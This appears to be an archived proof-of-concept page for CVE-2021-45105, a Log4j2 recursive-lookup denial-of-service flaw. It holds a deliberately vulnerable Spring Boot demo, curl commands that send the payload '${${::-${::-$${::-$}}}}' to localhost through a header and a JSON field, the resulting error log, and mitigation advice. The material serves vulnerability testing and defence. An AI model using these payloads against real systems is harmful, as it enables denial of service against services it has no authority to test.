Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-45105 PoC — Apache Log4j 安全漏洞

Source
https://github.com/dileepdkumar/https-github.com-pravin-pp-log4j2-CVE-2021-45105-1
Associated Vulnerability
Title:Apache Log4j 安全漏洞 (CVE-2021-45105)
Description:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4j2 2.0-alpha1到2.16.0版本(不包括2.12.3)存在安全漏洞,该漏洞源于自引用查找的不受控递归。攻击者可利用该漏洞在解释精心编制的字符串时导致拒绝服务。此问题已在2.17.0 和 2.12.3中修复。
Readme
# Sample Log4j2 vulnerable application (CVE-2021-45105) 
# Versions Affected: all versions from 2.0-beta9 to 2.16.0

This application is based on Spring Boot web application vulnerable to CVE-2021-45105

It uses Log4j 2.16.0

![](./screenshot.png)

## Running the application

Run it:

```
Import the project in Java IDE as a maven project

Run CVEMainApplication.java as a spring boot app.

```

## Exploitation steps

* Then, trigger the exploit using:

```bash
For GET ->
curl 127.0.0.1:8080 -H 'X-Api-Version: ${${::-${::-$${::-$}}}}'


For Post request ->
curl --location --request POST 'http://127.0.0.1:8080/addrecord' \
--header 'Content-Type: application/json' \
--data '{
	"clientRef": "${${::-${::-$${::-$}}}}"
}'
```


* Notice the output showing Infinite loop, however in testing did not find out that this DOS to be resource consuming as this infinite loop identified by program and error out:

```

 ${ctx:apiVersion} ${ctx:clientRef}2021-12-18 14:29:56,759 http-nio-8080-exec-1 ERROR An exception occurred processing Appender Console java.lang.IllegalStateException: Infinite loop in property interpolation of ::-${::-$${::-j}}: :
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.checkCyclicSubstitution(StrSubstitutor.java:1081)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1029)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:1042)
	at org.apache.logging.log4j.core.lookup.StrSubstitutor.substitute(StrSubstitutor.java:912)
	
```

## Mitigation : 

Java 8 (or later) users should upgrade to release 2.17.0.

Alternatively, this can be mitigated in configuration:

In PatternLayout in the logging configuration, replace Context Lookups like ${ctx:loginId} or $${ctx:loginId} with Thread Context Map patterns (%X, %mdc, or %MDC).
Otherwise, in the configuration, remove references to Context Lookups like ${ctx:loginId} or $${ctx:loginId} where they originate from sources external to the application such as HTTP headers or user input.
File Snapshot

 [4.0K]  /data/pocs/3a3769e3e782ddcb8f998a2c7328770afdda541e
├── [1.3K]  pom.xml
├── [2.0K]  README.md
├── [ 31K]  screenshot.png
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  java
        │   └── [4.0K]  com
        │       └── [4.0K]  log4j
        │           └── [4.0K]  cve
        │               ├── [ 308]  CVEMainApplication.java
        │               ├── [ 221]  InputRequest.java
        │               └── [1013]  RestMainController.java
        └── [4.0K]  resources
            └── [ 430]  log4j2.xml

7 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.